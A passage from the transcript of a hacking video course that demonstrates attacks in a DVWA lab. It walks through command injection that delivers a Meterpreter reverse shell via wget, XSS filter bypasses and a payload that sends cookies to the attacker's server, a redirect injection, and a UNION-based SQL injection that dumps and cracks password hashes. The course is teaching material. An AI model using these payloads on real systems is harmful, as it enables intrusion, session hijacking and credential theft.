used, we can also exploit it using the pipe character. So I can type 192.168.1.1 and then the pipe, which is this upper line, and then after it I specify ls-la. And this will work as well. As we can see, we get the output of ls-la command. Great. Now, if we were to change the security level to high, I think I read somewhere that high is an example of how the code should be written, so it isn't really exploitable. You can change it right here, you can submit, and you can go to the command execution and check out the source code right here. It seems to only require the integers, and it checks whether all of your inputs are integers, and it splits the IP address into 4 octets. It does that first, it splits it right here, then it checks if every octet is an integer, and if it is an integer, then it combines those octets once again back, and it pings that target. Okay, so we have covered command injection vulnerability, and now you know how to try to find it and exploit it. In the next video, we're going to move on to the next vulnerability. See you there. Okay, so we have covered command injection. But you can combine this vulnerability with other tools as well. For example, in the last video, we managed to establish connection using Netcat and command injection vulnerability. But we can improve this by injecting a different payload, such as a Meterpreter shell or a reverse shell that we coded in Python. The process of doing that is the same, so I will show you how to send a Meterpreter payload to the target and make it execute with command injection. Why would we want to do this? Well, we always want to have the best payload possible. So why would we use Netcat when Meterpreter gives us a lot more useful options to run on the target system? And to do all of that, here are the steps that we must perform. We must first create the payload appropriate for our target. Then we must download that payload to our target machine with the help of command injection vulnerability. And at last, we must execute that payload also with the help of command injection vulnerability. So, sounds pretty simple, right? Let's figure out what payload we should create first. So to create payload, we need to figure out what do we know about our target. Well, we know that Metasploitable is a Linux 32-bit machine, so we can create a Linux Meterpreter payload. But for this case, I like Python payload a lot better. So let's create a Python Meterpreter shell. Great thing about Linux systems is it comes default with Python, so Python payload is something that we can execute on our target without them having to install any additional software. Let's create it real quick. So I will navigate to my desktop directory, and here I will type msf venom -b, and I will specify that we want to create Python Meterpreter /reverse TCP. The lhost is going to be our IP address, so let's check it out real quick. It is 192.168.1.9. Copy it and paste it right here. For the L port, we can use port 6000, for example, and we are going to output this two arrows into tester.py. And I just named the payload tester, but feel free to name it anything that you want. I will press enter here, and this will create our Python payload. Let me go right here, lower this, and while this is creating, make sure that your burp suite is started up. Also make sure that your intercept is turned off, and start up your Firefox and your Metasploitable virtual machine. Okay, so once you do that, here in just a few seconds, our payload should be done. And here it is. Now that we got a payload created, we must figure out how can we deliver it to the target system. Of course, we will do that using the command injection, but even then, the target must be able to download our payload from somewhere, right? For this, we're going to use Apache to web server and host our payload there. Apache comes with Kali Linux already, so we can make it run real quick. To do that, we must first type sudo and then service apache2 start. It will ask us for the password, we input the password, and this will start our Apache2 web server. What does this mean? Well, this means that any file that is hosted inside of /var/www/html directory in our Kali Linux will be hosted on our web page to anyone that visits our IP address. Let's first of all visit that directory. So if I go cd var www.html, type ls here, and we got shell.exe from some previous video, which we can delete straight away. And this might require root privileges, so let us just enter root account sudo su and let's delete the shell.exe. And now our directory is empty, so no files are being hosted on our web server. Let's copy our tester, which in my case is in my home directory, Mr. Hacker and desktop, tester.py, and we want to copy it inside of var www and html. And now if we were to go to our Kali Linux machine and visit the IP address of my Kali Linux, which is 192.168.1.9, we are going to see this page that has this file available to download. Great. All we're left to do right now is to execute this file on target system. Let's go to our command injection page on our Metasploitable. And to do that, we visit the IP address of Metasploitable, navigate to dvwa. All of this we already know. Let us enter username and password and go to the command injection. But before we do that, change the security level to either low or medium. Once we do that, inside of the command injection, we can execute the commands as from the previous video. So if I type right here 192.168.1.1 and dot and comma and then ls after it, it will ping the router's IP address and it will also print out the contents of that directory. But we don't want to ping every time, we can just type dot and comma, which will specify that we want to enter a next command, and we can just type ls after it, and this will just give us an output of the ls command. And we won't have to wait for the ping command to finish. Now, let's download our payload using wget command. And wget is something that you can run from a terminal in order to download a specific file from the page or link that you specify. Let me show you inside of terminal first. So right now I'm inside of the /home/Mr. Hacker directory and I don't have the tester.py right here. But if I run the command wget and then 192.168.1.9, which is the IP address of Kali Linux, / and then tester.py, with this link we are accessing this page right here and this file right here, which will tell our terminal that we want to download that file. If I press enter, it will download tester.py, and if I type ls once again, now we have tester.py inside of our home and Mr. Hacker directory. We want to do the same thing on our target machine. So to do that, we can use dot and comma to specify the next command and type the same command, wget 192.168.1.9 /tester.py. I press submit, and if I run the ls command once again, now we have one additional file, which is our payload. So it is there. It is on the target machine right now with the help of command injection. The last step we have to do is to set up a listener inside of MSF console. So let's do that real quick. And after we set up a listener, we must execute our payload. And here is the MSF console. We are already familiar with setting up of the listener. We're going to use exploit multi-handler, and we need to set the payload to be python/meterpreter/reverse_TCP. If I show options, all we want to do is set the L host and L port, and that will be the IP address of Kali Linux, and the L port will be 6000. The same options that we specified inside of MSF Venom. Then I will run this, and all we're left to do right now is to execute this tester.py with the help of command injection. So let's see how we can do that. If I type dot and comma and python tester.py, press enter, this page will load. And these are good news because that would most likely mean that we got the meterpreter shell opened. With the help of Python, we executed our Python program on the target machine, and it opened our meterpreter shell, where we can execute various commands as usual. We can run help command to see what else we can execute, and we can basically perform post-exploitation that we already covered. Great. So this is just another way that you can use command injection to your advantage to spawn a better payload than just a simple netcat command execution. So you can try to test this with our Python payload if you want. Great. Now that we covered the command injection vulnerability, in the next video, we're going to go into cross-site scripting vulnerability. See you there. Welcome back. I want to talk about another vulnerability that we mentioned in the theory video, and that is cross-site scripting. If you remember, this is a vulnerability where we execute code due to poor user input filtering. In this attack, it is not the server that is getting targeted, but the users that visit that website. There are three main types of XSS attack. There is reflected XSS, stored XSS, and DOM-based XSS. And in this course, we will be covering first two, which are reflected and stored XSS. But before we do that, let's quickly remind ourselves of scenario as to how this attack looks like. So the attacker finds an XSS vulnerability, they inject JavaScript code that they want the target to execute inside of their browsers, and then anyone who visits that web page will execute the JavaScript code that you injected. This is an example of stored XSS, where the victim doesn't have to click on any links. All they need to do is to visit the same page on their own, and they will execute that script that you injected. So how does this work? Well, this is possible only in case the script that you injected is getting stored on the server. This would most likely be if there is, for example, a page where you need to type in some type of a comment, and then that comment will show on that page. If that comment input is vulnerable, then you most likely will have a stored XSS, because anyone loading that page after that will load your comment as well, and if your comment was a JavaScript code, they will execute that code. So what does this mean? Well, this means once you inject it, it will stay on the server, and server will host that page with malicious JavaScript code to anyone trying to visit it. On the other hand, reflected XSS is a little bit different. It won't work on anyone that visits the page, it will only work if you send a link with malicious code to someone. In this scenario, the server doesn't store our injected code on their side, so it won't be hosting the page with our code. However, the code injection vulnerability could still exist. If we find it, then we would craft our JavaScript code that we want victims to execute, and we would send those links to anyone that we want. Once they click on the link and open the website page, our JavaScript code will also get executed. Now, these types of attacks are usually used for session stealing or by attackers to mine on targets' PCs and create web botnets. But our goal is to just find the bug itself, and we will demonstrate how cookie stealing works later. Let's get straight into it. Okay, So the thing that we need is our Metasploitable running. I got it already up, and we also need the DVWA page. Make sure that you have burpsuit running with intercept turned off, and once you do all of that, you want to navigate to the XSS reflected right here, because this is the first example of XSS that we're going to cover in this video. Another thing that you want to do is you want to set the security level to be low for our first example. And let's give it a try to figure out whether this even has an XSS vulnerability. So what does this application do? Well, here it asks us to input our name. So I'll just go and type here Alexa inside of this input just to see what happens. So if I click on submit, okay, so it prints out hello Alexa. What a welcoming application, right? And this right here is an example of how it should work. You type in your name, it will welcome you with hello and then your name. However, what happens once we try to inject JavaScript code? The most simple JavaScript code, and what we usually do first once hunting for XSS, is type this code. So let me go in terminal just so you can see it better. So this arrow to the left, then script, arrow to the right, alert, and inside of the brackets we put 1 between single quotes, or you can actually put anything you want, and you close the script tags. And this right here is a JavaScript code. It tells the page to alert us with number 1. And once again, you can specify anything between these quotes. So what does this mean? This means it will open that small pop-up window at the top of the page where it should print out 1. And these script tags right here are just a way for us to tell the web page, hey, anything that's inside of these script tags, you should read as JavaScript code and not HTML code. And this at the end is just the closed script tag, which is telling the web page, here is where JavaScript code ends. This alert is a JavaScript function that will alert whatever is inside of these brackets. So let's give it a try, and let's input this inside of our user input instead of a name. I will copy it, go to my page, and paste it right here. So script, alert, and closed script. I click on submit, and here it is. We have XSS vulnerability since it ran our code and it opened this small window. We can see it says 1, which is what we alerted. Well, this was pretty easy. Since this was on low settings, we can assume no user input was filtered, therefore we managed to execute this. And as easy as this looks like, there are many pages that are currently on internet that are vulnerable to this type of bug, even with this simple script. And as harmless as this looks, it can be used to do some serious damage on client side, depending on what exactly you send them as JavaScript code. Let me show you what I mean. What you would do after actually creating the XSS vulnerability and finding it, you would copy the code with the JavaScript code that you injected, and anyone that clicks on the link, so I will just simulate right here someone clicking on a link, they click on the link that you sent, they press enter, they will also execute that JavaScript code. As we can see right here, they will also get a pop-up window that says 1. And this is a reflected cross-site scripting attack. Anyone that opens this link will also execute this. They don't have to type the JavaScript code themselves. Now that we did this, let us also take a quick look at the source code of this page. So I will open view source, and here is the PHP code for this specific page. And they just paste our input right here. They don't perform any filtering whatsoever. Now that we covered the low security level, let's try to find XSS in a medium level security to see if it works. So I will close this, go to the DVWA security, and I will change from low to medium. Click on submit, and this will change everything to a medium. So let's go back to XSS reflected, and let's first type the name to see whether it gives the same output. And it does. It prints out hello and then the name. So now let's try the same script that we did with the low security. So open script tags, I will alert 1, and I will close script tags. Click on submit. It seems that they actually remove the script tags. We can only see right here hello alert 1, and it doesn't give us a pop-up window that says 1. This means there is some type of filtering performed onto this page, because we don't get that window and our code doesn't get executed. By the output of our application, we can assume that the filtering performs removing of script tags. And usually this is type of filtering that you will encounter. Why? Well, because script tags automatically mean to the web page that JavaScript code is coming. So some web pages perform filtering just by removing these script tags. But let's see whether they filtered it well enough. They seem to filtered script like this, but have they filtered script like this? What if I write it in capital letters? Will that also be filtered? Let's give it a try. If I type script and then alert, and I also close the script with capital letters, click on submit, and here it is. We got it to run once again. So all we had to do was write scripts in capital letters. They only filtered out lower lettercase script. Let's make sure that that is the case by going and visiting the source code, and let's see what did they do. And here it is. Inside of the print statement, they used the string replace function onto the script tags and replaced it with empty space. And that is the reason why with the first example, we didn't get script printed out, we only got alert 1 printed out, since they removed our script tags. But we managed to bypass this with capital script letters. But what would happen if they, for example, also filtered the capital script letters? Well, then we could do something like this. We could type, and let me write it first in terminal just so you can see it better. We could write something like this, scr, and then open another, left arrow, script, close right arrow, and then ipt, close another, right arrow, alert 1, and close script tags. And the reason why we are writing script tags like this is because our web page only filters the opening script tags. It only filters this. It doesn't filter closed script tags. So what did we do right here? Why would this work? Well, before I explain it, let me first give it a try onto the web page just to see if it would work. And it does indeed work. So what I essentially did right here is I split this script tag into 2 pieces. And what the web page does, it only filters out entire script tag. So what the web page would do is it would see this opening bracket, then script and closing bracket, it would remove it, but then we would still be left with a script tag. So if I go right here, and let's pretend that we're the web page, we'll filter out the opening script tag, so let's remove this. And what do we get? Well, we get another opening script tag that won't be removed. And that is why this would work as well. Great. Now let us see the attack where we steal cookies from the person that visits our link. Those cookies could then be used to steal their session and possibly enter their online account on that website if the website session management is also poor. Right now, we will see only how to get that cookie with cross-site scripting. So to do this, we must first see where are we going to receive the cookie value. So they will execute the code and our code will extract the cookie, but where is it going to send it? For this, we're going to start a small Python HTTP server that we will send the cookie to. So how to do that? Well, we can go inside of our terminal and just type the command python-m and then simple HTTP server and then the port number where we want to host it. Let's say port number 8000. If I press enter, this will start the HTTP server on all interfaces on port 8000. Then the malicious JavaScript code that we want to inject is this right here. I will first write it in another terminal and then we're going to copy it inside of the page. So we must first start with capital script. Because we are on medium level, the regular script won't work. then we can type document.write, open brackets, then type one single quote, open another left arrow, and image source equals, open double quotes, HTTP / and then the IP address of our Kali Linux machine, and then the port on which we are running that Python server, which in my case is 8000. Then we can add another / and close single quote. After it we add a plus and then document.cookie. After that, space and another plus, and after that comes single quote, space, double quote, close right arrow, another single quote, close bracket, dot and comma, and then the close script tags. Okay, I know what you're thinking. What even is this? And this can be a little bit challenging for someone who never encountered JavaScript before. However, this is just JavaScript syntax. It's just a programming language. And after a few times trying XSS, you will pretty much get used to it and it won't be that weird looking once you write it. Since I assume that for anyone that hasn't encountered this before, this looks pretty terrible. But what we're essentially doing right here is we're opening script tags in capital letters because of the filtering on our page, and then we're writing the document.cookie, which is the cookie session of the user visiting that page and running this code, and sending that to the IP address on port 8000, since that is where we are running our Python server. And here we should get printed out the cookie session ID once someone visits our link with this JavaScript code. And at the end, all we are doing is we're closing the script tags. So let's give it a try and run this in our user input, copy it once again, go to our page and type it here. If I press enter or submit, well, nothing seems to happen right here, but if I go to my web server, here it is. Here is our target's cookie. Here is PHP session ID, and that is the cookie value. It even tells right here that we got the security on medium. And this is something that we might be able to use to steal their session. However, more about that later. For now, we saw how to find an XSS vulnerability in both low and medium security level. As I said, this can be one of the challenging parts of the course. However, if there is anything you don't quite fully get, feel free to post a question so we can clarify it even more and make it understandable. Great. In the next video, we're going to do this same vulnerability, just we're going to see how it would look like if it was a stored XSS. Remember, this what we covered is called reflected XSS, and target will only execute the code if they open the link with our JavaScript code. In the next video, we'll see the vulnerability where the JavaScript code gets stored on the server itself. Welcome back. And it is time that we cover another version of XSS attack, which is called stored XSS. In the previous video, we covered the reflected XSS, and this is pretty much the same thing. It is the same vulnerability, just this time our code will get stored on the server side. And it is more dangerous because everyone that visits that page from the time that we injected our JavaScript code will also run that code. You don't have to send them any link or anything else. The code will run by itself as soon as they visit that page. And we already know where we can find the example of stored XSS, so let us just go to our Metasploitable IP address in the DVWA and let us log in. As usual, make sure that your burp suit is running and make sure that the intercept is turned off. I will zoom this in so we can see everything better, and let us first navigate to the DVWA security and check low right here. After we do that, let us submit and go to the stored XSS. So once again, this is the same vulnerability. We want to inject JavaScript code in user input fields. So what do we got here inside of our application? Well, it asks for name and message. Vulnerability stored cross-site scripting. And why is this stored? Well, if we take a look at down here, it seems that someone already made a comment. Name is test, and the message or comment says this is a test comment. And you might already see why this is stored. It is already on the page, and anyone that visits this page will also see this comment. So this is something that everyone that loads the page will also load this comment as a string. But what happens if we try to, for example, input JavaScript code? Will they also load that? Yes, they will. Let me show you an example. First, let us create a regular comment. So I'm just going to type Alexa and hello there, can you see me? And let's sign guestbook. And we can see right here our comment has been added. So everyone will also be able to see this. But what happens if we, for example, try to inject JavaScript code? Let's go with simple alert script. So script, alert. And if we continue typing, we will notice that we cannot really type anymore in this field. So it could be that this field is limited to only certain amount of characters. So let's just leave that on test. And let's try to inject the code here. If I go onto the script, then alert, and I alert 1, and I closed the script tags, here we can input the entire script. So let's sign guestbook, and our JavaScript code executes. There is no user input filtering, therefore, since we are on low level, we will inject a simple code as alert 1. Now, the good part about this is that now, since this comment has been added to this list, every time we visit that page, every time they will execute our code, or we will execute our code. So we don't have to type it once again, as we had to with XSS reflected. Remember, if we type inside of the reflected a simple alert script, it will execute, but once we change a page and go back to the XSS reflected, there is no code running. However, on stored, we will run this code every time. And that is why it is more dangerous. For example, if you did the same attack as from the previous video where we stole cookies, if you inject that code here, then anyone that visits this page, their cookie will be sent to you. And you can then perform session hijacking or something else if cookies aren't configured correctly. And this will also happen if we log out of the page. For example, if I go log out and I go back to the page and go back to the XSS stored, this executes once again. Now, if this starts getting annoying because you want to start testing other examples as well, what you can do is you can go to setup right here and create or reset database. Once you click on this button, navigate back to XSS stored, you will no longer have the comments that we added in this video. You will only have this test comment that is there by default. Okay, great. Now let us take a look at the medium level security. So if I go on medium, submit, go back to the XSS stored, and I try to input right here, it still seems to be limited characters. So we can't type longer words than this. Let's give it a try right here. So script alert 1. And here we can name test. It doesn't work. It seems that we get these slashes before our single quotes. So let's take a look at the source code just to see what is happening inside of our fields. And it tells us right here in the comments that this code right here sanitizes the message input, or in other words, the comment input. And this sanitizes or filters the name input. So it seems that we have this HTML special chars function onto our comment. And usually once you have that, there will be no XSS vulnerability since it filters all the characters that you can use to perform XSS attack. So most likely this part doesn't have any vulnerability. So message input or comment input is not something that we are going to try to attack. But what about this name input? It only has this string replace regular script with empty space, which we saw in the previous video. We can simply just bypass this with capital script tag. But there is another problem that we encounter. We cannot specify more than a couple characters in the name field. Is that something that we can bypass? Well, if I type like this, I will not be able to type more than this, but if I go and inspect element of this page, I find the name input right here, and I can do that by going right here on dev, navigating to here, navigating to form, then from the form, this table, and I want to select this name input right here. So let us give it a try and see which one it is. It is this first one, and if I click on this last arrow, we can see right here that once we select the name input field, right here we got the max length of 10. Is that something that we can change? Well, let's give it a try. If I select that and instead of 10 I type 100, press enter, and I try to continue typing, well, now it works. We navigated to this field, we found the input name field, and it said the max length was 10, but we just added another 0, and now we can type even more characters. So let's give it a try. Remember, the only filtering that is inside of the name field is the script tag, so let us make it capital. And here we can type anything, since we know that this is most likely not vulnerable to the XSS attack, and if I click on Sign Guestbook, there it is. Here is our XSS vulnerability. And that is all about stored XSS. It is completely the same as the reflected XSS, just this will get stored on the server page, and anyone will load it once visiting that page. Great. Now that we covered XSS, in the next video I want to talk about a small vulnerability that many penetration testers skip when testing for web application vulnerabilities, and that is called HTML injection. And we're also going to mention why we should never skip checking for the HTML injection. See you in the next video. Welcome back. I want to quickly talk about another vulnerability or a bug, which is called HTML injection. And it is quite similar to the cross-site scripting attack. Just as its name says, in this type of the attack, we're not injecting JavaScript code, but instead we're injecting HTML code. And you might say that that is not really dangerous. However, even though that is correct, HTML injection is still a bug that you should be searching for. Why? Well, if there is an HTML injection in some big company, what an attacker could do is they could change the entire page look. They could add whatever they want to that page, they could post different pictures, they could completely change that web page to their own liking just by injecting HTML code. And that would be pretty bad for that company, because someone else would have a complete control of how that page would look like. So how can we test for that? How can we find HTML injection? Well, you can just go and navigate to the XSS reflected and XSS stored that we covered in previous videos, and we can test for HTML injections here. So usually what you want to test is different HTML tags such as h1, h2 or different header tags, just to see whether your input will be interpreted as HTML code. So let's give it a try. Everything is on low, and if I go right here and just type h1, which is an HTML tag for header size 1, and I type test, close the HTML tag by typing these arrows and then close h1, I click on submit, and we can see it does indeed interpret our input as an HTML code. If we were to type, for example, h2 or h3 and then test once again, this would be smaller size, which is a good enough indication that there is an HTML injection on this page. Now, there is no point of us changing this to medium or high, because this specific input is used for JavaScript attacks, so only JavaScript syntax will be filtered, therefore HTML injection will be the same on medium level security as well. As I mentioned, this is also a bug and it should be reported, because For now, we only typed in a small HTML code which changes our input to size 1 header and size 3 header. But what we could also do, for example, on a stored page, and let me just reset the database real quick from the previous video where we covered the access stored. And if you were to type an HTML injection right here, let's say the name will be test, and here we type this code. Let me first write it inside of a terminal, and then we're going to copy it to this page, just so you can see everything better. So open brackets and then meta HTTP equiv equals open double quotes, refresh, close double quotes, content equals 0, dot and comma, and then space URL equals http://google.com. And then close double quotes and close the tag by typing slash and close right arrow. If we were to inject this code, well, let's just see what would happen. Let's copy this code right here, go to our page and type it here. I click on sign guestbook, and do you see what is happening? It is constantly trying to go to a different page, and it is constantly refreshing that page. It pretty much made the page completely unusable, because we cannot even go up here and type something in. So what we must do is we must change to a different directory such as file inclusion and go and clear our database or reset the database, because we will not be able to visit the stored since it will automatically start refreshing the page and trying to visit google.com. However, if we were to type same right here in the reflected and we were to change, for example, from google.com to facebook.com and click on submit, well, pretty much the same thing would happen, but for some reason it doesn't want to visit facebook.com, and we're going to take a look at why that is. Let us see whether we specified something incorrectly. So URL equals HTTP. Okay, so I've tested it out, and for some reason it doesn't seem to work on Kali Linux browser, but if I go to my Windows 10 machine and I visit the Metasploitable page, and right here I copy the same code that we just sent in our Kali Linux, just we copy it and try it from our Windows 10 machine. I just change the URL to be bing.com, paste it right here, and click on submit. Well, now it fully redirects our access reflected input and the entire page to this bing.com website. Let's give it a try what happens if we do that on the stored. So I type test as name and I type this command right here as a message, and it appears that there is a limitation of characters right here. So what we can do is we can inspect the element, navigate to the body, then let's go and find the message input. So under the form, we go table, body, and message input. We check right here. It says that the max length is 50. So what I can do is I can type 500. And now if I go and try to copy this, so I will just delete all of this, paste the code and click sign guestbook. Well, now it actually redirects. So you will see that even when I try to go back and I go, for example, to brute force and again on access stored, it will just load bing.com. So with the help of code injection, we can even redirect pages to different websites. And this is usually what attackers do. So if they find a stored code injection vulnerability, what they will do is they will just inject a redirection link to a different website, possibly a malicious website, or a website where they advertise something or something similar. And every time someone visits a page, for example, they want to go on access stored on our Metasploitable page, well, they just load bing.com. And that is the power of HTML injection vulnerability. So now that we covered this, in the next video, we're going to go on to another big vulnerability, which is called SQL injection. See you there. Welcome back. Let's talk about another big vulnerability in web applications that involves databases, and that is called SQL injection. So we already talked about how this works. So you find a user input on a website that communicates with the database. Usually those inputs are something like usernames or passwords or a page where you're searching for some type of a product. Once you input product, the website communicates with the database to see if it has it. Then the database responds back, and all of that is done with the help of SQL language and SQL queries. But as usual, user input might not be well filtered, and we might be able to inject SQL code there and send our own SQL queries to the database. Maybe on that website there are online accounts and their passwords are stored in a database. If we were to find SQL injection on a website like that, we could potentially extract usernames and passwords of all of the accounts through that SQL injection. This is an example of how an SQL query could look like. It is very similar to English language, and what this statement essentially does is it selects some type of element from a table where some condition is fulfilled. And table is just a part of database. Databases are consisted of tables and columns. Now, I will be real right here. If you're encountering SQL injection for the first time or SQL language for the first time, you might find this a little bit hard. However, through practice, this will become easier and easier. Here we can see an example of how a real-world SQL query could look like. Here, books are our table from the database, ID is our condition, and this star sign indicates that we want to extract everything. Usually in programming world, star sign means everything. Great. Now that we know behind the scenes of how an SQL injection works, let's try to perform one on our DVWA page. So let's go right here, log in as usual to our DVWA page. And let's first select the DVWA security to allow and navigate to the SQL injection. Now, you might notice that we also have SQL injection blind, and this is something that we're going to talk about later on. For now on, let's just focus on this SQL injection tab. So, what do we have right here? We have something called user ID. And usually, we would input something like a number right here. So, let's give it a try. If I, for example, input number 1, and click on submit, well, it will tell me that the ID of 1 is a user with the first name admin and surname admin, and that user has ID 1. What if we type 2, for example? We click on submit. Well, we got a user with ID 2, his name is Gordon and his last name is Brown. And we can go for each and every number if we want. For example, the ID 5 has first name Bob and last name Smith. But to search for the SQL injection, what we can do is we can type some special characters, and that might throw an error if there is an SQL injection. For example, if I type apostrophe or a single quote and I click on submit, it will throw me this error. It will say you have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near line 1. And this already is an indication that we have SQL injection bug, since it interpreted our apostrophe as a part of SQL syntax. So for now we know that there is an SQL error because we got an SQL error syntax, but before we continue, let's first explain why does this give an error? Why using a single quote gives us an error? Well, let me show you like this. If I open terminal, let's just go and find a program that will allow us to write text. And here we got some text editor under the usual applications. I'm going to open that and I'm going to enlarge it just so we can type something right here. And now that we open this, let's explain why apostrophe gives an error in SQL syntax. Well, as we already mentioned in our slides, usually we will have an SQL syntax or an SQL query that will look something like this. So select and then something from a certain table where some condition is fulfilled. And for our page right here, if I go back, since we have user IDs, first names and last names, it could possibly look something like this. So select name, comma, surname from the table that could be named something like accounts, we don't know that yet, where ID equals, and then the ID number goes between single quotes. So this could possibly be our SQL query that we send to the database, and then the database retrieves the user under the ID 2. But what happens when we type apostrophe is instead of these two, and instead of it filtering the apostrophe, it just writes it between these two single quotes. And then we get three single quotes. The opening single quote, and then our single quote that we injected becomes the closing single quote, and then the third one is the single quote that's hanging. It doesn't belong to anything, therefore the SQL throws an error that it has one single quote more than it should have. And whenever that happens, you got an SQL injection bug. And this is also called the error-based SQL injection, because it throws us an error. On the other hand, we got the blind SQL injection that doesn't throw an error, so there are some other methods that we must use for that one in order to figure out whether it exists. Now that we know that there is an SQL injection, what we can do is we can type some other statements as well. For example, we can select the ID number 2 and then close the single quote inside of that SQL query, and we can type some logical statements such as, for example, and 1 equals 1. And keep in mind that this right here, if I copy it and write it down, has single quotes between the numbers. And it doesn't have the single quote at the end because inside of our SQL query, we already have a single quote at the end. So this single quote will cover the last part of this one, and this first single quote will cover the first part of these two. So essentially, once added to our SQL query, it would look something like this. Instead of this single quote, we would have this. And you can see this opening and closing single quote fulfills our statement. Let's give it a try and run this. And we will just get the information about user under the ID 2. And that is because our statement is correct. So we select the user ID 2 and we say do that in case 1 is equal to 1. And 1 is equal to 1, so there are no problems, it just prints the username. But if we were to type the same command, just change 1 equals 2 and click on submit, we wouldn't get any output right here. That is because 1 is not equal to 2, therefore it won't print the user under the ID 2. That could be another sign that there is an SQL injection. Now that we know for sure that there is an SQL injection, we can try some other commands, such as, for example, this one. So if I go down here and type 2, single quote, and this is just us selecting the ID number 2, and then use a statement called order by 1, and add dash dash, then space and single quote at the end. So let's explain this command. The reason we have this dash dash, space and then single quote is because that is referred to as a comment. This dash dash is a comment, and we must add this at the end of our statement, at the end of our SQL query, because otherwise it would throw us an error. We must have it so we don't get error when running our SQL commands. And order by 1 will just check whether there is column 1, and we are going to do that for 2, for 3 as well, and we're going to see how many columns do we have. So if I copy this and go back to here, paste this, click on submit, we will get an output first name Gordon and surname Brown. That means this is a valid statement. Let's try with order by 2. So just change from 1 to 2 and click on submit. And this is also a valid statement because we get the first name and surname. And if we try number 3 and click on submit, well, there is an error, unknown column 3 in order clause. And that's how we know that we have 2 columns. Now, let's see what those 2 columns are. If I go and type this command, and I'm going to type it right here first, 2 as our ID, and then union select 1 and 2. And let's not forget our comment at the end by specifying dash dash and then single quote. If I copy this and I paste it right here, click on submit. Okay, so we get this output right here. the first name for the ID 2, and we get the first name 1 and surname 2. Now that we know that we have 2 columns and that we have an SQL injection vulnerability, we're going to start extracting data. So we know that we have 2 output fields, the first name and the surname field. So we're going to try to extract the database name and the user of the database. To do that, we can type the command to select the user ID and then union select, and we're going to type database open and close brackets and comma user open close brackets. At the end, we add our comment with a single quote, and here we are specifying the functions called database and user. These 2 functions are already defined in MySQL. So let's copy this command just to see the name of the database and the name of the user and type it right here. And we get the first name, which will store the database name, which is dvwa, and the surname or the user, which is going to be root at localhost. Now that we know this, we can try to extract the list of the databases by injecting the following command. So after this, we once again start with 2 and then union select. These select statements you can also type in capital letters. It doesn't really matter. You can type capital or lowercase letters. What matters is that you type the correct command syntax. So right now we're going to call for schema underscore name, comma 2 from information underscore, and let me just enlarge this so the entire command can fit. So 2 from information underscore schema dot schemata dash dash and then close single quote. Okay, so let's just copy this and see what do we get with this command. If I copy, go to my page and paste it right here, well, we get quite a few results back. And we essentially get different databases outputted right here. We got our DVWA database, we got Metasploit database, MySQL database, OWASP 10. And since we're doing this all inside of the DVWA application on our Metasploitable, we would most likely be interested in this DVWA result. So let's try to extract even more from it. We can use the following command, which is ID2 and then union select table underscore name, comma 2 from information underscore schema dot tables. So you might be wondering what even are these, and this is just regular syntax for the SQL language. These are just something that you will get used to over time. Once we type from information schema dot tables, where the table underscore schema is going to be equal to the one that we want, and in our case that is DVWA. So we can just type equal open single quote DVWA close single quote and then our comment dash dash quote. Let's copy this entire command, copy it and paste it right here. Now I'm not sure if I copied the entire command, so I'm just going to go back and add what's missing, which is 2 and then single quote and then union. Click on submit. And here is the output. So with this command, we sent a query where we requested names of all the tables inside the DVWA database. We got 2 results, which is guestbook and users. And this users right here could be interesting for us, so let's dive deep into it. We want to extract columns inside of this users table. We can do that by injecting this command right here. So let me just make a few spaces and type the next command, which we, as usual, start with 2 and then apostrophe. Union select, and now we're selecting columns, so we are going to type, instead of table name, we're going to type column underscore name, comma, column underscore type from information underscore schema dot columns. Remember, in the last command we used dot tables. Now we are using dot columns because we are furthermore diving into our database. and we need a condition at the end. So where table underscore schema is going to be equal to dvwa and table underscore name equals users. So remember, we got two results right here, and we want to go with the users one first because that looks more interesting to us than this guestbook table. Okay, so let's copy this command, and now I'm going to copy the entire command. So select, copy, and paste right here, and click on submit. And again, we get a lot of results. Here they are. Can you guess which one out of all of these columns are most interesting to us? If you guess the password one, well, you guessed right. But we also want to extract other columns as well, such as usernames, which we get right here, such as first names, last names, IDs as well, and all of that we want to extract. To do this, we will need to use the concat function, because we only have two fields available to input our result. So we must concat a few results in one field and the rest of the results in the other field. We can concat, for example, user ID, first name and last name in the first name field, and we can concat the usernames and passwords in the surname field. So let's see how that command would look like. If I go back and add a few more spaces, let's type 2 and then apostrophe union select, and then use the concat function to concat multiple fields into one, and we can do that by specifying which fields we want inside of this function. Let's type user underscore ID as a first field, comma, and we're going to separate them with two dots. So comma, and then first underscore name, which is going to be our second field, comma, let's use again two dots to separate that also from the last name. And these are the three fields that we're going to concat into first result. Then after it, we want to type comma and concat the usernames and passwords into second result. So let's type it like this, password. And at the end, we must specify from where are we extracting all of this. And in our case, since our database is called dvwa, we're also accessing the users table. So we must type it like this. So extract all of this from dvwa.users. Add the comment at the end. And let's copy all of this. And submit. Well, here it is. Here is all of the information about all of the users from this database. In the first name field, we get the user ID, followed by the first name, followed by the last name. And in the surname field, we get the username and the password. So we successfully performed SQL injection and we extracted all of the information about all of the users inside of their database. But you will notice that passwords are rather strange, right? This is because they are hashed. Usually, websites store hashed value of passwords inside their database for security reasons, since even if something like an SQL injection happened and someone managed to extract the entire database, they wouldn't get passwords in plain text, but rather as hashed value that they need to run a dictionary attack on in order to find it in plain text. And by looking at them, I would say that this is probably MD5 hash. We can figure this out by copying one of these passwords. So let's go with this one, for example. Going to Google and just pasting it inside of the search bar. And we can see most of the results are MD5, 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 so we can guess that this is an MD5 hash. And since this is an easy password, if I click on this link, it will even tell me which password this MD5 hash is. So it is the password ABC123. So if I go back to this page, we can conclude that Gordon has a password of ABC123 because this website showed us what is the string of this hash that we pasted. We can do that for any other hash as well. As long as it is a simple password, it should manage to find it online. If I go and paste this one, for example. Go right here, click on this website, MD5 hash for password is this. So it seems that our MD5 hash is a string of password. So our user called admin has a password that is simply just password. And that is how you extract the entire database with the SQL injection vulnerability. Now, this is probably the hardest bug that we are going to cover inside of our web application section. And it might take some time for you to get used to it and to get used to all of this SQL syntax that we performed right here. For example, these database functions, user functions, could be known by someone that already knows SQL, since these are already the inbuilt functions, and that also stands for all of these syntax like table name, like information_schema.columns, and the rest of these commands. But if you practice it more and more, you will eventually get better at performing SQL injection. Okay, great. So we performed SQL injection, and in the next video, we're ready to continue discovering even more bugs on our DVWA application. See you there. Welcome back. In this video, I want to talk about a vulnerability called CSRF, or also known as cross-site request forgery. Now, this is something that you might remember from the scanning section of the course, where we used Nmap to discover vulnerabilities, and on one of our targets we got response that possible CSRF vulnerability was there. Well, the time has come to finally see what is this vulnerability. Many 